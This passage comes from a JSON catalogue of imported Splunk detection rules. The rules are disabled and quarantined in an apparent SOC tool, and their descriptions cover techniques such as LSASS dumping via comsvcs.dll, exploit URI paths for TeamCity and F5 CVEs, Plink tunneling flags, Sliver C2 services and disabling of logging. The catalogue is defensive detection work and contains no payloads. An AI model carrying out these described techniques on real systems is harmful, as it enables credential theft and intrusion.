This activity is significant because adversaries often use remote access tools to maintain unauthorized access to compromised environments.\nIf confirmed malicious, this activity could allow attackers to control systems remotely, exfiltrate data, or deploy additional malware, posing a severe threat to the organization's security.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1219" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-remote-access-software-usage-traffic.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "885ea672-07ee-475a-879e-60d28aa5dd42", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/detect_remote_access_software_usage_traffic.yml" } }, { "id": "splunk-security-content-886a8f46-d7e2-4439-b9ba-aec238e31732", "type": "detection", "name": "ASL AWS ECR Container Upload Unknown User", "description": "The following analytic detects unauthorized container uploads to AWS Elastic Container Registry (ECR) by monitoring AWS CloudTrail events. It identifies instances where a new container is uploaded by a user not previously recognized as authorized. This detection is crucial for a SOC as it can indicate a potential compromise or misuse of AWS ECR, which could lead to unauthorized access to sensitive data or the deployment of malicious containers. By identifying and investigating these events, organizations can mitigate the risk of data breaches or other security incidents resulting from unauthorized container uploads. 
The impact of such an attack could be significant, compromising the integrity and security of the organization's cloud environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1204.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/asl-aws-ecr-container-upload-unknown-user.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "886a8f46-d7e2-4439-b9ba-aec238e31732", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/asl_aws_ecr_container_upload_unknown_user.yml" } }, { "id": "splunk-security-content-886c7e51-2ea1-425d-8705-faaca5a64cc6", "type": "detection", "name": "Kubernetes Anomalous Traffic on Network Edge", "description": "The following analytic identifies anomalous network traffic volumes between Kubernetes workloads or between a workload and external sources. It leverages Network Performance Monitoring metrics collected via an OTEL collector and pulled from Splunk Observability Cloud. The detection compares recent network metrics (tcp.bytes, tcp.new_sockets, tcp.packets, udp.bytes, udp.packets) over the last hour with the average over the past 30 days to identify significant deviations. This activity is significant as unexpected spikes may indicate unauthorized data transfers or lateral movement. 
If confirmed malicious, it could lead to data exfiltration or compromise of additional services, potentially resulting in data breaches.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1204" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/kubernetes-anomalous-traffic-on-network-edge.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "886c7e51-2ea1-425d-8705-faaca5a64cc6", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/kubernetes_anomalous_traffic_on_network_edge.yml" } }, { "id": "splunk-security-content-88bf127c-613e-4579-99e4-c4d4b02f3840", "type": "detection", "name": "F5 TMUI Authentication Bypass", "description": "The following analytic detects attempts to exploit the CVE-2023-46747 vulnerability, an authentication bypass flaw in F5 BIG-IP's Configuration utility (TMUI). It identifies this activity by monitoring for specific URI paths such as \"*/mgmt/tm/auth/user/*\" with the PATCH method and a 200 status code. This behavior is significant for a SOC as it indicates potential unauthorized access attempts, leading to remote code execution. 
If confirmed malicious, an attacker could gain unauthorized access, execute arbitrary code, steal data, disrupt systems, or conduct further malicious activities within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/f5-tmui-authentication-bypass.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "88bf127c-613e-4579-99e4-c4d4b02f3840", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/web/f5_tmui_authentication_bypass.yml" } }, { "id": "splunk-security-content-89275e7e-0548-11ec-bf75-acde48001122", "type": "detection", "name": "Get-DomainTrust with PowerShell Script Block", "description": "The following analytic detects the execution of the Get-DomainTrust command from PowerView using PowerShell Script Block Logging (EventCode=4104). This method captures the full command sent to PowerShell, allowing for detailed inspection. Identifying this activity is significant because it may indicate an attempt to gather domain trust information, which is often a precursor to lateral movement or privilege escalation. 
If confirmed malicious, this activity could enable an attacker to map trust relationships within the domain, potentially leading to further exploitation and compromise of additional systems.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1482" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/get-domaintrust-with-powershell-script-block.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "89275e7e-0548-11ec-bf75-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/get_domaintrust_with_powershell_script_block.yml" } }, { "id": "splunk-security-content-892dfeaf-461d-4a78-aac8-b07e185c9bce", "type": "detection", "name": "PingID New MFA Method Registered For User", "description": "The following analytic detects the registration of a new Multi-Factor Authentication (MFA) method for a PingID (PingOne) account. It leverages JSON logs from PingID, specifically looking for successful device pairing events. This activity is significant as adversaries who gain unauthorized access to a user account may register a new MFA method to maintain persistence. 
If confirmed malicious, this could allow attackers to bypass existing security measures, maintain long-term access, and potentially escalate their privileges within the compromised environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1621", "T1556.006", "T1098.005" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/pingid-new-mfa-method-registered-for-user.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "892dfeaf-461d-4a78-aac8-b07e185c9bce", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/pingid_new_mfa_method_registered_for_user.yml" } }, { "id": "splunk-security-content-892eb674-3344-4143-8e52-4775b1daf3f1", "type": "detection", "name": "Linux Auditd Private Keys and Certificate Enumeration", "description": "The following analytic detects suspicious attempts to find private keys, which may indicate an attacker's effort to access sensitive cryptographic information. Private keys are crucial for securing encrypted communications and data, and unauthorized access to them can lead to severe security breaches, including data decryption and identity theft. 
By monitoring for unusual or unauthorized searches for private keys, this analytic helps identify potential threats to cryptographic security, enabling security teams to take swift action to protect the integrity and confidentiality of encrypted information.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1552.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-auditd-private-keys-and-certificate-enumeration.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "892eb674-3344-4143-8e52-4775b1daf3f1", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_auditd_private_keys_and_certificate_enumeration.yml" } }, { "id": "splunk-security-content-8943b567-f14d-4ee8-a0bb-2121d4ce3184", "type": "detection", "name": "Dump LSASS via comsvcs DLL", "description": "The following analytic detects the behavior of dumping credentials from memory by exploiting the Local Security Authority Subsystem Service (LSASS) using the comsvcs.dll and MiniDump via rundll32. This detection leverages process information from Endpoint Detection and Response (EDR) logs, focusing on specific command-line executions. This activity is significant because it indicates potential credential theft, which can lead to broader system compromise, persistence, lateral movement, and privilege escalation. 
If confirmed malicious, attackers could gain unauthorized access to sensitive information, leading to data theft, ransomware attacks, or other damaging outcomes.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1003.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/dump-lsass-via-comsvcs-dll.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "8943b567-f14d-4ee8-a0bb-2121d4ce3184", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/dump_lsass_via_comsvcs_dll.yml" } }, { "id": "splunk-security-content-894f48ea-8d85-4dcd-9132-c66cdb407c9b", "type": "detection", "name": "Windows Apache Benchmark Binary", "description": "The following analytic detects the execution of the Apache Benchmark binary (ab.exe), commonly used by MetaSploit payloads. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process creation events where the original file name is ab.exe. This activity is significant as it may indicate the presence of a MetaSploit attack, which uses Apache Benchmark to generate malicious payloads. If confirmed malicious, this could lead to unauthorized network connections, further system compromise, and potential data exfiltration. 
Immediate investigation is required to determine the intent and scope of the activity.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-apache-benchmark-binary.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "894f48ea-8d85-4dcd-9132-c66cdb407c9b", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_apache_benchmark_binary.yml" } }, { "id": "splunk-security-content-894fc43e-6f50-47d5-a68b-ee9ee23e18f4", "type": "detection", "name": "System User Discovery With Whoami", "description": "The following analytic detects the execution of `whoami.exe` without any arguments. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process execution logs. This activity is significant because both Red Teams and adversaries use `whoami.exe` to identify the current logged-in user, aiding in situational awareness and Active Directory discovery. 
If confirmed malicious, this behavior could indicate an attacker is gathering information to further compromise the system, potentially leading to privilege escalation or lateral movement within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1033" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/system-user-discovery-with-whoami.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "894fc43e-6f50-47d5-a68b-ee9ee23e18f4", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/system_user_discovery_with_whoami.yml" } }, { "id": "splunk-security-content-8976744a-ae7a-46a4-8128-690df85c2af4", "type": "detection", "name": "Windows Visual Basic Commandline Compiler DNSQuery", "description": "The following analytic detects instances where vbc.exe, the Visual Basic Command Line Compiler, initiates DNS queries. Normally, vbc.exe operates locally to compile Visual Basic code and does not require internet access or to perform DNS lookups. Therefore, any observed DNS activity originating from vbc.exe is highly suspicious and indicative of potential malicious activity. This behavior often suggests that a malicious payload is masquerading as the legitimate vbc.exe process to establish command-and-control (C2) communication, resolve domains for data exfiltration, or download additional stages of malware. 
Security teams should investigate the process's parent, command-line arguments, and the resolved domains for further indicators of compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1071.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-visual-basic-commandline-compiler-dnsquery.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "8976744a-ae7a-46a4-8128-690df85c2af4", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_visual_basic_commandline_compiler_dnsquery.yml" } }, { "id": "splunk-security-content-898debf4-3021-11ec-ba7c-acde48001122", "type": "detection", "name": "Disable Defender Spynet Reporting", "description": "The following analytic detects the modification of the registry to disable Windows Defender SpyNet reporting. It leverages data from the Endpoint.Registry data model, specifically monitoring changes to the registry path associated with Windows Defender SpyNet settings. This activity is significant because disabling SpyNet reporting can prevent Windows Defender from sending telemetry data, potentially allowing malicious activities to go undetected. 
If confirmed malicious, this action could enable an attacker to evade detection, maintain persistence, and carry out further attacks without being flagged by Windows Defender.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/disable-defender-spynet-reporting.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "898debf4-3021-11ec-ba7c-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/disable_defender_spynet_reporting.yml" } }, { "id": "splunk-security-content-89a58e5f-1365-4793-b45c-770abbb32b6c", "type": "detection", "name": "JetBrains TeamCity RCE Attempt", "description": "The following analytic detects attempts to exploit the CVE-2023-42793 vulnerability in JetBrains TeamCity On-Premises.\nIt identifies suspicious POST requests to /app/rest/users/id:1/tokens/RPC2, leveraging the Web datamodel to monitor specific URL patterns and HTTP methods.\nThis activity is significant as it may indicate an unauthenticated attacker attempting to gain administrative access via Remote Code Execution (RCE).\nIf confirmed malicious, this could allow the attacker to execute arbitrary code, potentially compromising the entire TeamCity environment and leading to further unauthorized access and data breaches.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190" ], "log_source": null, "playbook": null, 
"verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/jetbrains-teamcity-rce-attempt.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "89a58e5f-1365-4793-b45c-770abbb32b6c", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/web/jetbrains_teamcity_rce_attempt.yml" } }, { "id": "splunk-security-content-89dad3ee-57ec-43dc-9044-131c4edd663f", "type": "detection", "name": "Windows Service Create SliverC2", "description": "The following analytic detects the creation of a Windows service named \"Sliver\" with the description \"Sliver Implant,\" indicative of SliverC2 lateral movement using the PsExec module. It leverages Windows EventCode 7045 from the System Event log to identify this activity. This behavior is significant as it may indicate an adversary's attempt to establish persistence or execute commands remotely. 
If confirmed malicious, this activity could allow attackers to maintain control over the compromised system, execute arbitrary code, and further infiltrate the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1569.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-service-create-sliverc2.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "89dad3ee-57ec-43dc-9044-131c4edd663f", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_service_create_sliverc2.yml" } }, { "id": "splunk-security-content-89dddbad-369a-4f8a-ace2-2439218735bc", "type": "detection", "name": "Web Spring Cloud Function FunctionRouter", "description": "The following analytic identifies HTTP POST requests to the Spring Cloud Function endpoint containing \"functionRouter\" in the URL. It leverages the Web data model to detect these requests based on specific fields such as http_method, url, and http_user_agent. This activity is significant because it targets CVE-2022-22963, a known vulnerability in Spring Cloud Function, which has multiple proof-of-concept exploits available. 
If confirmed malicious, this activity could allow attackers to execute arbitrary code, potentially leading to unauthorized access, data exfiltration, or further compromise of the affected system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190", "T1133" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/web-spring-cloud-function-functionrouter.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "89dddbad-369a-4f8a-ace2-2439218735bc", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/web/web_spring_cloud_function_functionrouter.yml" } }, { "id": "splunk-security-content-8a1259cb-0ea7-409c-8bfe-74bad89259f9", "type": "detection", "name": "Windows AD ServicePrincipalName Added To Domain Account", "description": "The following analytic detects the addition of a Service Principal Name (SPN) to a domain account. It leverages Windows Event Code 5136 and monitors changes to the servicePrincipalName attribute. This activity is significant because it may indicate an attempt to perform Kerberoasting, a technique where attackers extract and crack service account passwords offline. 
If confirmed malicious, this could allow an attacker to obtain cleartext passwords, leading to unauthorized access and potential lateral movement within the domain environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1098" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-ad-serviceprincipalname-added-to-domain-account.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "8a1259cb-0ea7-409c-8bfe-74bad89259f9", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_ad_serviceprincipalname_added_to_domain_account.yml" } }, { "id": "splunk-security-content-8a1b22eb-50ce-4e26-a691-97ff52349569", "type": "detection", "name": "O365 Admin Consent Bypassed by Service Principal", "description": "The following analytic identifies instances where a service principal in Office 365 Azure Active Directory assigns app roles without standard admin consent. It leverages `o365_management_activity` logs, specifically focusing on the 'Add app role assignment to service principal' operation. This activity is significant for SOCs as it may indicate a bypass of critical administrative controls, potentially leading to unauthorized access or privilege escalation. 
If confirmed malicious, this could allow an attacker to misuse automated processes to assign sensitive permissions, compromising the security of the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1098.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/o365-admin-consent-bypassed-by-service-principal.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "8a1b22eb-50ce-4e26-a691-97ff52349569", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/o365_admin_consent_bypassed_by_service_principal.yml" } }, { "id": "splunk-security-content-8a2f3ca2-4eb5-4389-a549-14063882e537", "type": "detection", "name": "AWS Defense Evasion Stop Logging Cloudtrail", "description": "The following analytic detects `StopLogging` events in AWS CloudTrail logs. It leverages CloudTrail event data to identify when logging is intentionally stopped, excluding console-based actions and focusing on successful attempts. This activity is significant because adversaries may stop logging to evade detection and operate stealthily within the compromised environment. 
If confirmed malicious, this action could allow attackers to perform further activities without being logged, hindering incident response and forensic investigations, and potentially leading to unauthorized access or data exfiltration.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.008" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/aws-defense-evasion-stop-logging-cloudtrail.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "8a2f3ca2-4eb5-4389-a549-14063882e537", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/aws_defense_evasion_stop_logging_cloudtrail.yml" } }, { "id": "splunk-security-content-8a618ade-ca8f-4d04-b972-2d526ba59924", "type": "detection", "name": "Windows Process Injection Remote Thread", "description": "The following analytic detects suspicious remote thread execution in processes such as Taskmgr.exe, calc.exe, and notepad.exe, which may indicate process injection by malware like Qakbot. This detection leverages Sysmon EventCode 8 to identify remote thread creation in specific target processes. This activity is significant as it often signifies an attempt by malware to inject malicious code into legitimate processes, potentially leading to unauthorized code execution. 
If confirmed malicious, this could allow attackers to execute arbitrary code, escalate privileges, or maintain persistence on the compromised host.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1055.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-process-injection-remote-thread.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "8a618ade-ca8f-4d04-b972-2d526ba59924", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_process_injection_remote_thread.yml" } }, { "id": "splunk-security-content-8a9c1d2e-3f4b-5c6d-7e8f-9a0b1c2d3e4f", "type": "detection", "name": "Cisco Secure Firewall - SSH Connection to sshd_operns", "description": "This analytic detects inbound SSH connections to the sshd_operns service on network devices using Cisco Secure Firewall Intrusion Events.\nAPT actors have been observed enabling sshd_operns and opening it on non-standard ports to maintain encrypted remote access to compromised network infrastructure.\nThis detection leverages Snort signature 65368 to identify connections to this service, which when combined with other indicators may signal persistent access mechanisms established by threat actors.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1021.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": 
"detections/splunk-imports/_quarantine/cisco-secure-firewall-ssh-connection-to-sshd-operns.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "8a9c1d2e-3f4b-5c6d-7e8f-9a0b1c2d3e4f", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/cisco_secure_firewall___ssh_connection_to_sshd_operns.yml" } }, { "id": "splunk-security-content-8a9e5f2b-6d4c-4e7f-9b3a-1c8d7f5e2a9b", "type": "detection", "name": "Cisco ASA - Device File Copy to Remote Location", "description": "This analytic detects file copy operations to remote locations on Cisco ASA devices via CLI or ASDM.\nAdversaries may exfiltrate device files including configurations, logs, packet captures, or system data to remote servers using protocols like TFTP, FTP, HTTP, HTTPS, SMB, or SCP. 
While legitimate backups to centralized servers are common, copies to unexpected destinations may indicate data exfiltration to attacker-controlled infrastructure.\nThe detection monitors for command execution events (message ID 111008 or 111010) containing copy commands with remote protocol indicators (tftp:, ftp:, http:, https:, smb:, scp:).\nInvestigate copies to unexpected destinations, from non-administrative accounts, or outside approved maintenance windows.\nWe recommend adapting the detection filters to exclude known legitimate backup activities.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1005", "T1041", "T1048.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-asa-device-file-copy-to-remote-location.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "8a9e5f2b-6d4c-4e7f-9b3a-1c8d7f5e2a9b", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/cisco_asa___device_file_copy_to_remote_location.yml" } }, { "id": "splunk-security-content-8aac5e1e-0fab-4437-af0b-c6e60af23eed", "type": "detection", "name": "Windows Protocol Tunneling with Plink", "description": "This analytic detects the use of Plink (including renamed versions like pvhost.exe) for protocol tunneling, which may be used for egress or lateral movement within an organization. 
It identifies specific command-line options (-R, -L, -D, -l, -N, -P, -pw) commonly used for port forwarding and tunneling by analyzing process execution logs from Endpoint Detection and Response (EDR) agents. This activity is significant as it may indicate an attempt to bypass network security controls or establish unauthorized connections. If confirmed malicious, this could allow an attacker to exfiltrate data, move laterally across the network, or maintain persistent access, posing a severe threat to the organization's security. The detection covers both the original Plink executable and potential renamed versions, enhancing its ability to catch evasion attempts.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1572", "T1021.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-protocol-tunneling-with-plink.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "8aac5e1e-0fab-4437-af0b-c6e60af23eed", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_protocol_tunneling_with_plink.yml" } }, { "id": "splunk-security-content-8acbc04c-c882-11eb-b060-acde48001122", "type": "detection", "name": "Powershell Fileless Script Contains Base64 Encoded Content", "description": "The following analytic detects the execution of PowerShell scripts containing Base64 encoded content, specifically identifying the use of `FromBase64String`. It leverages PowerShell Script Block Logging (EventCode=4104) to capture and analyze the full command sent to PowerShell. 
This activity is significant as Base64 encoding is often used by attackers to obfuscate malicious payloads, making it harder to detect. If confirmed malicious, this could lead to code execution, allowing attackers to run arbitrary commands and potentially compromise the system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1027", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/powershell-fileless-script-contains-base64-encoded-content.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "8acbc04c-c882-11eb-b060-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/powershell_fileless_script_contains_base64_encoded_content.yml" } }, { "id": "splunk-security-content-8b07c2c9-0cde-4c44-9fa6-59dcf2b25777", "type": "detection", "name": "Cisco NVM - Susp Script From Archive Triggering Network Activity", "description": "This analytic detects script execution (`wscript.exe` or `cscript.exe`) triggered from compressed files opened directly using\n`explorer.exe`, `winrar.exe`, or `7zFM.exe`.\nWhen a user double clicks on a \".js\" file from within one of these compressed files. 
